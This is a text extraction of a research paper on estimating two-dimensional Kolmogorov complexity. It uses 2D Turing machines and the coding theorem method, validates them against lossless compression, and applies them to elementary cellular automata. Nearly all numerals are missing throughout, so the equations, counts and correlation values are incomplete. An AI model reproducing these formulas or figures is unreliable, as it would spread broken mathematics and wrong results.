and addressing, iso/iec dtr - , , . [ ] wang wenfeng, xie jianping, etc. product and service digital identification format for information procession. sj/t - , . . two-dimensional kolmogorov complexity and an empirical validation of the coding theorem method by compressibility submitted may accepted september published september corresponding author hector zenil, hectorz@labores.eu academic editor mikael skoglund additional information and declarations can be found on page doi . /peerj-cs. copyright zenil et al. distributed under creative commons cc-by . open access two-dimensional kolmogorov complexity and an empirical validation of the coding theorem method by compressibility hector zenil , , , fernando soler-toscano , , jean-paul delahaye , and nicolas gauvrit , unit of computational medicine, department of medicine solna, scilifelab (science for life laboratory), centre for molecular medicine and karolinska institute, stockholm, sweden department of computer science, university of oxford, uk grupo de lógica, lenguaje e información, universidad de sevilla, spain cristal (centre de recherche en informatique, signal et automatique de lille), france chart lab, école pratique des hautes etudes, paris, france algorithmic nature group, labores, paris, france abstract we propose a measure based upon the fundamental theoretical concept in algorithmic information theory that provides a natural approach to the problem of evaluating n-dimensional complexity by using an n-dimensional deterministic turing machine. the technique is interesting because it provides a natural algorith- mic process for symmetry breaking generating complex n-dimensional structures from perfectly symmetric and fully deterministic computational rules producing a distribution of patterns as described by algorithmic probability. algorithmic probability also elegantly connects the frequency of occurrence of a pattern with its algorithmic complexity, hence effectively providing estimations to the complexity of the generated patterns. experiments to validate estimations of algorithmic complexity based on these concepts are presented, showing that the measure is stable in the face of some changes in computational formalism and that results are in agreement with the results obtained using lossless compression algorithms when both methods overlap in their range of applicability. we then use the output frequency of the set of -dimensional turing machines to classify the algorithmic complexity of the space-time evolutions of elementary cellular automata. subjects computational biology, artificial intelligence, theory and formal methods keywords algorithmic complexity, algorithmic probability, kolmogorov–chaitin complexity, algorithmic information theory, cellular automata, solomonoff–levin universal distribution, information theory, dimensional complexity, image complexity, small turing machines introduction the question of natural measures of complexity for objects other than strings and sequences, in particular suited for -dimensional objects, is an open important problem in complexity science and with potential applications to molecule folding, cell distribution, artificial life and robotics. here we provide a measure based upon the fundamental how to cite this article zenil et al. ( ), two-dimensional kolmogorov complexity and an empirical validation of the coding theorem method by compressibility. peerj comput. sci. :e ; doi . /peerj-cs. mailto:hectorz@labores.eu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. theoretical concept that provides a natural approach to the problem of evaluating n-dimensional algorithmic complexity by using an n-dimensional deterministic turing machine, popularized under the term of turmites for n = , from which the so-called langton’s ant is an example of a turing universal turmite. a series of experiments to validate estimations of kolmogorov complexity based on these concepts is presented, showing that the measure is stable in the face of some changes in computational formalism and that results are in agreement with the results obtained using lossless compression algo- rithms when both methods overlap in their range of applicability. we also present a divide and conquer algorithm that we call block decomposition method (bdm) application to classification of images and space–time evolutions of discrete systems, providing evidence of the soundness of the method as a complementary alternative to compression algorithms for the evaluation of algorithmic complexity. we provide exact numerical approximations of kolmogorov complexity of square image patches of size and more, with the bdm allowing scalability to larger -dimensional arrays and even greater dimensions. the challenge of finding and defining -dimensional complexity measures has been identified as an open problem of foundational character in complexity science (feldman & crutchfield, ; shalizi, shalizi & haslinger, ). indeed, for example, humans understand -dimensional patterns in a way that seems fundamentally different than -dimensional (feldman, ). these measures are important because current -dimensional measures may not be suitable to -dimensional patterns for tasks such as quantitatively measuring the spatial structure of self-organizing systems. on the one hand, the application of shannon’s entropy and kolmogorov complexity has traditionally been designed for strings and sequences. however, n-dimensional objects may have structure only distinguishable in their natural dimension and not in lower dimensions. this is indeed a question related to the loss of information in dimension reductionality (zenil, kiani & tegnér, in press). a few measures of -dimensional complexity have been proposed before building upon shannon’s entropy and block entropy (feldman & crutchfield, ; andrienko, brilliantov & kurths, ), mutual information and minimal sufficient statistics (shalizi, shalizi & haslinger, ) and in the context of anatomical brain mri analysis (young et al., ; young & schuff, ). a more recent application, also in the medical context related to a measure of consciousness, was proposed using lossless compressibility for egg brain image analysis was proposed in casali et al. ( ). on the other hand, for kolmogorov complexity, the common approach to evaluating the algorithmic complexity of a string has been by using lossless compression algorithms because the length of lossless compression is an upper bound of kolmogorov complexity. short strings, however, are difficult to compress in practice, and the theory does not pro- vide a satisfactory solution to the problem of the instability of the measure for short strings. here we use so-called turmites ( -dimensional turing machines) to estimate the kolmogorov complexity of images, in particular space–time diagrams of cellular automata, using levin’s coding theorem from algorithmic probability theory. we study the problem of the rate of convergence by comparing approximations to a universal distribution using different (and larger) sets of small turing machines and comparing the results to zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. that of lossless compression algorithms carefully devising tests at the intersection of the application of compression and algorithmic probability. we found that strings which are more random according to algorithmic probability also turn out to be less compressible, while less random strings are clearly more compressible. compression algorithms have proven to be signally applicable in several domains (see e.g., li & vitányi, ), yielding surprising results as a method for approximating kolmogorov complexity. hence their success is in part a matter of their usefulness. here we show that an alternative (and complementary) method yields compatible results with the results of lossless compression. for this we devised an artful technique by grouping strings that our method indicated had the same program-size complexity, in order to construct files of concatenated strings of the same complexity (while avoiding repetition, which could easily be exploited by compression). then a lossless general compression algorithm was used to compress the files and ascertain whether the files that were more compressed were the ones created with highly complex strings according to our method. similarly, files with low kolmogorov complexity were tested to determine whether they were better com- pressed. this was indeed the case, and we report these results in ‘validation of the coding theorem method by compressibility’. in ‘comparison of km and compression of cellular automata’ we also show that the coding theorem method yields a very similar classification of the space–time diagrams of elementary cellular automata, despite the disadvantage of having used a limited sample of a universal distribution. in all cases the statistical evidence is strong enough to suggest that the coding theorem method is sound and capable of producing satisfactory results. the coding theorem method also represents the only currently available method for dealing with very short strings and in a sense is an expensive but powerful “microscope” for capturing the information content of very small objects. kolmogorov–chaitin complexity central to algorithmic information theory (ait) is the definition of algorithmic (kolmogorov–chaitin or program-size) complexity (kolmogorov, ; chaitin, ): kt (s) = min{|p|,t(p) = s}. ( ) that is, the length of the shortest program p that outputs the string s running on a universal turing machine t. a classic example is a string composed of an alternation of bits, such as ( )n, which can be described as “n repetitions of ”. this repetitive string can grow fast while its description will only grow by about log (n). on the other hand, a random-looking string such as may not have a much shorter description than itself. uncomputability and instability of k a technical inconvenience of k as a function taking s to the length of the shortest program that produces s is its uncomputability (chaitin, ). in other words, there is no program which takes a string s as input and produces the integer k(s) as output. this is usually considered a major problem, but one ought to expect a universal measure of complexity zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. to have such a property. on the other hand, k is more precisely upper semi-computable, meaning that one can find upper bounds, as we will do by applying a technique based on another semi-computable measure to be presented in the ‘solomonoff–levin algorithmic probability’. the invariance theorem guarantees that complexity values will only diverge by a constant c (e.g., the length of a compiler, a translation program between u and u ) and that they will converge at the limit. invariance theorem (calude, ; li & vitányi, ): if u and u are two universal turing machines and ku (s) and ku (s) the algorithmic complexity of s for u and u , there exists a constant c such that for all s: |ku (s) − ku (s)| < c. ( ) hence the longer the string, the less important c is (i.e., the choice of programming language or universal turing machine). however, in practice c can be arbitrarily large because the invariance theorem tells nothing about the rate of convergence between ku and ku for a string s of increasing length, thus having an important impact on short strings. solomonoff–levin algorithmic probability the algorithmic probability (also known as levin’s semi-measure) of a string s is a measure that describes the expected probability of a random program p running on a universal (prefix-free ) turing machine t producing s upon halting. formally (solomonoff, ; the group of valid programs forms a prefix-free set (no element is a prefix of any other, a property necessary to keep < m(s) < ). for details see calude ( ). levin, ; chaitin, ), m(s) =  p:t(p)=s / |p|. ( ) levin’s semi-measure m(s) defines a distribution known as the universal distribution it is called a semi measure because the sum is never , unlike probability measures. this is due to the turing machines that never halt. (a beautiful introduction is given in kircher, li & vitanyi ( )). it is important to notice that the value of m(s) is dominated by the length of the smallest program p (when the denominator is larger). however, the length of the smallest p that produces the string s is k(s). the semi-measure m(s) is therefore also uncomputable, because for every s, m(s) requires the calculation of −k(s), involving k , which is itself uncomputable. an alternative to the traditional use of compression algorithms is the use of the concept of algorithmic probability to calculate k(s) by means of the following theorem. coding theorem (levin, ): |−log m(s) − k(s)| < c. ( ) this means that if a string has many descriptions it also has a short one. it beautifully connects frequency to complexity, more specifically the frequency of occurrence of a string with its algorithmic (kolmogorov) complexity. the coding theorem implies that (cover & thomas, ; calude, ) one can calculate the kolmogorov complexity of a string from zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. its frequency (delahaye & zenil, b; delahaye & zenil, a; zenil, ; delahaye & zenil, ), simply rewriting the formula as: km(s) = −log m(s) + o( ). ( ) an important property of m as a semi-measure is that it dominates any other effective semi-measure µ, because there is a constant cµ such that for all s, m(s) ≥ cµµ(s). for this reason m(s) is often called a universal distribution (kircher, li & vitanyi, ). the coding theorem method let d(n,m) be a function (delahaye & zenil, ) defined as follows: d(n,m)(s) = |{t ∈ (n,m) : t produces s}| |{t ∈ (n,m) : t halts }| ( ) where (n,m) denotes the set of turing machines with n states and m symbols, running with empty input, and |a| is, in this case, the cardinality of the set a. in zenil ( ) and delahaye & zenil ( ) we calculated the output distribution of turing machines with -symbols and n = ,..., states for which the busy beaver (radó, ) values are known, in order to determine the halting time, and in soler-toscano et al. ( ) results were improved in terms of number and turing machine size ( states) and in the way in which an alternative to the busy beaver information was proposed, hence no longer needing exact information of halting times in order to approximate an informative distribution. here we consider an experiment with -dimensional deterministic turing machines (also called turmites) in order to estimate the kolmogorov complexity of -dimensional objects, such as images that can represent space–time diagrams of simple systems. a turmite is a turing machine which has an orientation and operates on a grid for “tape”. the machine can move in directions rather than in the traditional left and right movements of a traditional turing machine head. a reference to this kind of investigation and definition of d turing machines can be found in wolfram ( ), one popular and possibly one of the first examples of this variation of a turing machine is lagton’s ant (langton, ) also proven to be capable of turing-universal computation. in ‘comparison of km and approaches based on compression’, we will use the so-called turmites to provide evidence that kolmogorov complexity evaluated through algorithmic probability is consistent with the other (and today only) method for approximating k , namely lossless compression algorithms. we will do this in an artful way, given that compression algorithms are unable to compress strings that are too short, which are the strings covered by our method. this will involve concatenating strings for which our method establishes a kolmogorov complexity, which then are given to a lossless compression algorithm in order to determine whether it provides consistent estimations, that is, to determine whether strings are less compressible where our method says that they have greater kolmogorov complexity and whether strings are more compressible where our method says they have lower kolmogorov complexity. we provide evidence that this is actually the case. zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in ‘comparison of km and compression of cellular automata’ we will apply the results from the coding theorem method to approximate the kolmogorov complexity of -dimensional evolutions of -dimensional, closest neighbor cellular automata as defined in wolfram ( ), and by way of offering a contrast to the approximation provided by a general lossless compression algorithm (deflate). as we will see, in all these experiments we provide evidence that the method is just as successful as compression algorithms, but unlike the latter, it can deal with short strings. deterministic -dimensional turing machines (turmites) turmites or -dimensional ( d) turing machines run not on a -dimensional tape but in a -dimensional unbounded grid or array. at each step they can move in four different directions (up, down, left, right) or stop. transitions have the format {n ,m } → {n ,m ,d}, meaning that when the machine is in state n and reads symbols m , it writes m , changes to state n and moves to a contiguous cell following direction d. if n is the halting state then d is stop. in other cases, d can be any of the other four directions. let (n,m) d be the set of turing machines with n states and m symbols. these machines have nm entries in the transition table, and for each entry {n ,m } there are nm + m possible instructions, that is, m different halting instructions (writing one of the different symbols) and nm non-halting instructions ( directions, n states and m different symbols). so the number of machines in (n,m) d is ( nm + m) nm. it is possible to enumerate all these machines in the same way as d turing machines (e.g., as has been done in wolfram ( ) and joosten ( )). we can assign one number to each entry in the transition table. these numbers go from to nm + m − (given that there are nm + m different instructions). the numbers corresponding to all entries in the transition table (irrespective of the convention followed in sorting them) form a number with nm digits in base nm + m. then, the translation of a transition table to a natural number and vice versa can be done through elementary arithmetical operations. we take as output for a d turing machine the minimal array that includes all cells visited by the machine. note that this probably includes cells that have not been visited, but it is the more natural way of producing output with some regular format and at the same time reducing the set of different outputs. figure shows an example of the transition table of a turing machine in ( , ) d and its execution over a ‘ ’-filled grid. we show the portion of the grid that is returned as the output array. two of the six cells have not been visited by the machine. an approximation to the universal distribution we have run all machines in ( , ) d just as we have done before for deterministic -dimensional turing machines (delahaye & zenil, ; soler-toscano et al., ). that is, considering the output of all different machines starting both in a ‘ ’-filled grid (all white) and in a ‘ ’-filled (all black) grid. symmetries are described and used in the same way than in soler-toscano et al. ( ) in order to avoid running a larger number of machines whose output can be predicted from other equivalent machines (by rotation, zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure top: example of a deterministic -dimensional turing machine. bottom: accumulated runtime distribution for ( , ) d. transposition, -complementation, reversion, etc.) that produce equivalent outputs with the same frequency. we also used a reduced enumeration to avoid running certain trivial machines whose behavior can be predicted from the transition table, as well as filters to detect non-halting machines before exhausting the entire runtime. in the reduced enumeration we considered only machines with an initial transition moving to the right and changing to a different state than the initial and halting states. machines moving to the initial state at the starting transition run forever, and machines moving to the halting state produce single-character output. so we reduce the number of initial transitions in (n,m) d to m(n − ) (the machine can write any of the m symbols and change to any state in { ,...,n}). the set of different machines is reduced accordingly to k(n − )( nm + m)nm− . to enumerate these machines we construct a mixed-radix number, given that the digit corresponding to the initial transition now goes from to m(n − ) − . to the output obtained when running this reduced enumeration we add the single-character arrays that correspond to machines zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. moving to the initial state at the starting transition. these machines and their output can be easily quantified. also, to take into account machines with the initial transition moving in a different direction than the right one, we consider the , and degree rotations of the strings produced, given that for any machine moving up (left/down) at the initial transition, there is another one moving right that produces the identical output but rotates − (− /− ) degrees. setting the runtime the busy beaver runtime value for ( , ) is steps upon halting. but no equivalent busy beavers are known for -dimensional turing machines (although variations of turmite’s busy beaver functions have been proposed (pegg, )). so to set the runtime in our experiment we generated a sample of × random machines in the reduced enumeration. we used a runtime of , steps for the runtime sample, this is . % of the machines in the reduced enumeration for ( , ) d, but , steps for running all ( , ) d. these machines were generated instruction by instruction. as we have explained above, it is possible to assign a natural number to every instruction. so to generate a random machine in the reduced enumeration for (n,m) d we produce a random number from to m(n − ) − for the initial transition and from to nm + m − for the other nm − transitions. we used the implementation of the mersenne twister in the boost c++ library. the output of this sample was the distribution of the runtime of the halting machines. figure shows the probability that a random halting machine will halt in at most the number of steps indicated on the horizontal axis. for steps this probability is . . note that the machines in the sample are in the reduced enumeration, a large number of very trivial machines halting in just one step having been removed. so in the complete enumeration the probability of halting in at most steps is even greater. but we found some high runtime values—precisely machines required more than , steps. the highest value was a machine progressing through , steps upon halting. so we have enough evidence to believe that by setting the runtime at , steps we have obtained almost all (if not all) output arrays. we ran all × turing machines in the reduced enumeration for ( , ) d. then we applied the completions explained before. output analysis the final output represents the result of ( nm + m) executions (all machines in ( , ) d starting with both blank symbols ‘ ’ and ‘ ’). we found , , , , non-halting machines and , , , halting machines. a number of , , different binary arrays were produced after days of calculation with a supercomputer of medium size (a × - cpus running at , mhz each with gb of memory each, located at the centro informático cientı́fico de andalucı́a (cica), spain. let d( , ) d be the set constructed by dividing the occurrences of each different array by the number of halting machines as a natural extension of eq. ( ) for -dimensional turing machines. then, for every string s, km, d(s) = −log (d( , )(s)) ( ) zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the top objects in d( , ) d preceded by their km, d values, sorted by higher to lower fre- quency and therefore from smaller to larger kolmogorov complexity after application of the coding theorem. only non-symmetrical cases are displayed. the grid is only for illustration purposes. using the coding theorem (eq. ( )). figure shows the top objects in d( , ) d, that is the objects with lowest kolmogorov complexity values. evaluating -dimensional kolmogorov complexity d( , ) d denotes the frequency distribution (a calculated universal distribution) from the output of deterministic -dimensional turing machines, with associated complexity measure km, d. d( , ) d distributes , , arrays into , different complexity values, with a minimum complexity value of . bits (an explanation of non-integer program-size complexity is given in soler-toscano et al. ( ) and soler-toscano et al. ( )), a maximum value of . bits and a mean of . . considering the number of possible square binary arrays given by the formula d×d (without considering any symmetries), d( , ) d can be said to produce all square binary arrays of length up to × , that is  d= d×d = square arrays, and , of the ( × ) = , square arrays with side of length (or dimension) d = . it only produces , of the , , zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure top: frequency of appearance of symmetric “checkerboard” patterns sorted from more to less frequent according to d( , ) d (displayed only non-symmetrical cases under rotation and complemen- tation). the checkerboard of size × doesn’t occur. however, all × as seen in fig. , including the “checkerboard” pattern of size × do occur. bottom: symmetry breaking from a fully deterministic set of symmetric computational rules. bottom left: with a value of km, d = . this is the simplest × square array after the preceding all-blank × array (with km, d = . ) and before the × square array with a black cell in one of the array corners (with complexity km, d = . ). bottom right: the only and most complex square array (with other symmetrical cases) in d( , ) d with km, d = . . another way to see this array is as one among those of length with low complexity given that it occurred once in the sampled distribution in the classification unlike all other square arrays of the same size that are missing in d( , ) d. possible square binary arrays of length d = and only , of the possible , , , of dimension d = . the largest square array produced in d( , ) d is of side length d = (left of fig. ) out of a possible × ; it has a km, d value equal to . . what one would expect from a distribution where simple patterns are more frequent (and therefore have lower kolmogorov complexity after application of the coding theorem) would be to see patterns of the “checkerboard” type with high frequency and low random complexity (k), and this is exactly what we found (see fig. ), while random looking patterns were found at the bottom among the least frequent ones (fig. ). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure symmetry breaking from fully deterministic symmetric computational rules. bottom objects in the classification with lowest frequency, or being most random according to d( , ) d. it is interesting to note the strong similarities given that similar-looking cases are not always exact symmetries. the arrays are preceded by the number of occurrences of production from all the ( , ) d turing machines. we have coined the informal notion of a “climber” as an object in the frequency classification (from greatest to lowest frequency) that appears better classified among objects of smaller size rather than with the arrays of their size, this is in order to highlight possible candidates for low complexity, hence illustrating how the process make low complexity patterns to emerge. for example, “checkerboard” patterns (see fig. ) seem to be natural “climbers” because they come significantly early (more frequent) in the classification than most of the square arrays of the same size. in fact, the larger the checkerboard array, the more of a climber it seems to be. this is in agreement with what we zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure two “climbers” (and all their symmetric cases) found in d( , ) d. symmetric objects have higher frequency and therefore lower kolmogorov complexity. nevertheless, a fully deterministic algo- rithmic process starting from completely symmetric rules produces a range of patterns of high complexity and low symmetry. have found in the case of strings (zenil, ; delahaye & zenil, ; soler-toscano et al., ) where patterned objects emerge (e.g., ( )n, that is, the string repeated n times), appearing relatively increasingly higher in the frequency classifications the larger n is, in agreement with the expectation that patterned objects should also have low kolmogorov complexity. an attempt of a definition of a climber is a pattern p of size a × b with small complexity among all a × b patterns, such that there exists smaller patterns q (say c × d, with cd < ab) such that km(p) < km(q) < median(km(all ab patterns)). for example, fig. shows arrays that come together among groups of much shorter arrays, thereby demonstrating, as expected from a measure of randomness, that array—or string—size is not what determines complexity (as we have shown before in zenil ( ), delahaye & zenil ( ) and soler-toscano et al. ( ) for binary strings). the fact that square arrays may have low kolmogorov complexity can be understood in several ways, some of which strengthen the intuition that square arrays should be less kolmogorov random, such as for example, the fact that for square arrays one only needs the information of one of its dimensions to determine the other, either height or width. figure shows cases in which square arrays are significantly better classified towards the top than arrays of similar size. indeed, % of the squares of size × are in the first fifth zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. (f ), as are the × arrays. square arrays of × are distributed as follows when dividing ( , ) d in equal parts: . %, . %, . %, . %, . %. validation of the coding theorem method by compressibility one way to validate our method based on the coding theorem (eq. ( )) is to attempt to measure its departure from the compressibility approach. this cannot be done directly, for as we have explained, compression algorithms perform poorly on short strings, but we did find a way to partially circumvent this problem by selecting subsets of strings for which our coding theorem method calculated a high or low complexity which were then used to generate a file of length long enough to be compressed. comparison of km and approaches based on compression it is also not uncommon to detect instabilities in the values retrieved by a compression algorithm for short strings, as explained in ‘uncomputability and instability of k ’, strings which the compression algorithm may or may not compress. this is not a malfunction of a particular lossless compression algorithm (e.g., deflate, used in most popular computer formats such as zip and png) or its implementation, but a commonly encountered problem when lossless compression algorithms attempt to compress short strings. when researchers have chosen to use compression algorithms for reasonably long strings, they have proven to be of great value, for example, for dna false positive repeat sequence detection in genetic sequence analysis (rivals et al., ), in distance measures and classification methods (cilibrasi & vitanyi, ), and in numerous other applications (li & vitányi, ). however, this effort has been hamstrung by the limitations of compression algorithms–currently the only method used to approximate the kolmogorov complexity of a string–given that this measure is not computable. in this section we study the relation between km and approaches to kolmogorov complexity based on compression. we show that both approaches are consistent, that is, strings with higher km value are less compressible than strings with lower values. this is as much validation of km and our coding theorem method as it is for the traditional lossless compression method as approximation techniques to kolmogorov complexity. the coding theorem method is, however, especially useful for short strings where losses compression algorithms fail, and the compression method is especially useful where the coding theorem is too expensive to apply (long strings). compressing strings of length – for this experiment we have selected the strings in d( ) with lengths ranging from to . d( ) is the frequency distribution of strings produced by all -dimensional deterministic turing machines as described in soler-toscano et al. ( ). table shows the number of d( ) strings with these lengths. up to length we have almost all possible strings. for length we have a considerable number and for length there are less than % of the possible strings. the distribution of complexities is shown in fig. . zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure complete reduced set (non-symmetrical cases under reversion and complementation) of × patches in km, d sorted from lowest to greatest kolmogorov complexity after application of the coding theorem (eq. ( )) to the output frequency of -d turing machines. we denote this set by km, d × . for example, the glider configurations in the game of life (gardner, ) come with high kolmogorov complexity (with approximated values of . and . ). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table number of strings of length – found in d( ). length (l) strings , , , , , , as expected, the longer the strings, the greater their average complexity. the overlapping of strings with different lengths that have the same complexity correspond to climbers. the experiment consisted in creating files with strings of different km-complexity but equal length (files with more complex (random) strings are expected to be less compressible than files with less complex (random) strings). this was done in the following way. for each l ( ≤ l ≤ ), we let s(l) denote the list of strings of length l, sorted by increasing km complexity. for each s(l) we made a partition of sets with the same number of consecutive strings. let’s call these partitions p(l,p), ≤ p ≤ . then for each p(l,p) we have created files, each with random strings in p(l,p) in random order. we called these files f(l,p,f ), ≤ f ≤ . summarizing, we now have: • different string lengths l, from to , and for each length • partitions (sorted by increasing complexity) of the strings with length l, and • files with random strings in each partition. this makes for a total of , different files. each file contains different binary strings, hence with length of × l symbols. a crucial step is to replace the binary encoding of the files by a larger alphabet, retaining the internal structure of each string. if we compressed the files f(l,p,f ) by using binary encoding then the final size of the resulting compressed files would depend not only on the complexity of the separate strings but on the patterns that the compressor discovers along the whole file. to circumvent this we chose two different symbols to represent the ‘ ’ and ‘ ’ in each one of the different strings in each file. the same set of symbols was used for all files. we were interested in using the most standard symbols we possibly could, so we created all pairs of characters from ‘a’ to ‘p’ ( different pairs) and from this set we selected two-character symbols that were the same for all files. this way, though we do not completely avoid the possibility of the compressor finding patterns in whole files due to the repetition of the same single character in different strings, we considerably reduce the impact of this phenomenon. the files were compressed using the mathematica function compress, which is an implementation of the deflate algorithm (lempel–ziv plus huffman coding). figure shows the distributions of lengths of the compressed files for the different string lengths. the horizontal axis shows the groups of files in increasing km. as the complexity of the zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure top: distribution of complexity values for different string lengths (l). bottom: distribution of the compressed lengths of the files. zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure scatterplot of km with -dimensional turing machines (turmites) as a function of km with -dimensional turing machines. strings grows (right part of the diagrams), the compressed files are larger, so they are harder to compress. the relevant exception is length , but this is probably related to the low number of strings of that length that we have found, which are surely not the most complex strings of length . we have used other compressors such as gzip (which uses lempel–ziv algorithm lz ) and bzip (burrows–wheeler block sorting text compression algorithm and huffman coding), with several compression levels. the results are similar to those shown in fig. . comparing ( , ) d and ( , ) we shall now look at how -dimensional arrays (hence strings) produced by d turing machines correlate with strings that we have calculated before (zenil, ; delahaye & zenil, ; soler-toscano et al., ) (denoted by d( )). in a sense this is like changing the turing machine formalism to see whether the new distribution resembles distributions following other turing machine formalisms, and whether it is robust enough. all turing machines in ( , ) are included in ( , ) d because these are just the machines that do not move up or down. we first compared the values of the , output strings in ( , ) to the -dimensional arrays found in ( , ) d. we are also interested in the relation between the ranks of these , strings in both ( , ) and ( , ) d. figure shows the link between km, d with d turing machines as a function of ordinary km, d (that is, simply km as defined in soler-toscano et al. ( )). it suggests a strong almost-linear overall association. the correlation coefficient r = . confirms zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure scatterplot of km with -dimensional turing machines as a function of km with - dimensional turing machines by length of strings, for strings of length – . the linear association, and the spearman correlation coefficient rs = . proves a tight and increasing functional relation. the length l of strings is a possible confounding factor. however fig. suggests that the link between one and -dimensional complexities is not explainable by l. indeed, the partial correlation rkm, dkm, d.l = . still denotes a tight association. figure also suggests that complexities are more strongly linked with longer strings. this is in fact the case, as table shows: the strength of the link increases with the length of the resulting strings. one and -dimensional complexities are remarkably correlated and may be considered two measures of the same underlying feature of the strings. how these measures vary is another matter. the regression of km, d on km, d gives the following approximate relation: km, d ≈ . + . km, d. note that this subtle departure from identity may be a consequence of a slight non-linearity, a feature visible in fig. . zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table correlation coefficients between one and -dimensional complexities by length of strings. length (l) correlation . . . . . . comparison of km and compression of cellular automata a -dimensional ca can be represented by an array of cells xi where i ∈ z (integer set) and each x takes a value from a finite alphabet Σ. thus, a sequence of cells {xi} of finite length n describes a string or global configuration c on Σ. this way, the set of finite configurations will be expressed as Σn. an evolution comprises a sequence of configurations {ci} produced by the mapping Φ:Σn → Σn; thus the global relation is symbolized as: Φ(ct ) → ct+ ( ) where t represents time and every global state of c is defined by a sequence of cell states. the global relation is determined over the cell states in configuration ct updated simultaneously at the next configuration ct+ by a local function ϕ as follows: ϕ(xti−r,...,x t i ,...,x t i+r) → x t+ i . ( ) wolfram ( ) represents -dimensional cellular automata (ca) with two parameters (k,r) where k = |Σ| is the number of states, and r is the neighborhood radius. hence this type of ca is defined by the parameters ( , ). there are Σn different neighborhoods (where n = r + ) and kk n distinct evolution rules. the evolutions of these cellular automata usually have periodic boundary conditions. wolfram calls this type of ca elementary cellular automata (denoted simply by eca) and there are exactly kk n = rules of this type. they are considered the most simple cellular automata (and among the simplest computing programs) capable of great behavioral richness. -dimensional eca can be visualized in -dimensional space–time diagrams where every row is an evolution in time of the eca rule. by their simplicity and because we have a good understanding about them (e.g., at least one eca is known to be capable of turing universality (cook, ; wolfram, )) they are excellent candidates to test our measure km, d, being just as effective as other methods that approach eca using compression algorithms (zenil, ) that have yielded the results that wolfram obtained heuristically. km, d comparison with compressed eca evolutions we have seen that our coding theorem method with associated measure km (or km, d in this paper for d kolmogorov complexity) is in agreement with bit string complexity as zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. approached by compressibility, as we have reported in ‘comparison of km and approaches based on compression’. the universal distribution from turing machines that we have calculated (d( , ) d) will help us to classify elementary cellular automata. classification of eca by compress- ibility has been done before in zenil ( ) with results that are in complete agreement with our intuition and knowledge of the complexity of certain eca rules (and related to wolfram’s ( ) classification). in zenil ( ) both classifications by simplest initial condition and random initial condition were undertaken, leading to a stable compress- ibility classification of ecas. here we followed the same procedure for both simplest initial condition (single black cell) and random initial condition in order to compare the classification to the one that can be approximated by using d( , ) d, as follows. we will say that the space–time diagram (or evolution) of an elementary cellular automaton c after time t has complexity: km, dd×d (c t ) =  q∈{ct }d×d km, d(q). ( ) that is, the complexity of a cellular automaton c is the sum of the complexities of the q arrays or image patches in the partition matrix {ct }d×d from breaking {c t } into square arrays of length d produced by the eca after t steps. an example of a partition matrix of an eca evolution is shown in fig. for eca rule and d = where t = . notice that the boundary conditions for a partition matrix may require the addition of at most d − empty rows or d − empty columns to the boundary as shown in fig. (or alternatively the dismissal of at most d − rows or d − columns) if the dimensions (height and width) are not multiples of d, in this case d = . if the classification of all rules in eca by km, d yields the same classification obtained by compressibility, one would be persuaded that km, d is a good alternative to compressibility as a method for approximating the kolmogorov complexity of objects, with the signal advantage that km, d can be applied to very short strings and very short arrays such as images. because all possible arrays of size × are present in km, d we can use this arrays set to try to classify all ecas by kolmogorov complexity using the coding theorem method. figure shows all relevant (non-symmetric) arrays. we denote by km, d × this subset from km, d. figure displays the scatterplot of compression complexity against km, d × calculated for every cellular automaton. it shows a positive link between the two measures. the pearson correlation amounts to r = . , so the determination coefficient is r = . . these values correspond to a strong correlation, although smaller than the correlation between - and -dimensional complexities calculated in ‘comparison of km and approaches based on compression’. concerning orders arising from these measures of complexity, they too are strongly linked, with a spearman correlation of rs = . . the scatterplots (fig. ) show a strong agreement between the coding theorem method and the traditional compression method when both are used to classify ecas by their approximation to kolmogorov complexity. zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure all the first ecas (the other are – reverted rules) starting from the simplest (black cell) initial configuration running for t = steps, sorted from lowest to highest complexity according to km, d × . notice that the same procedure can be extended for its use on arbitrary images. zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / 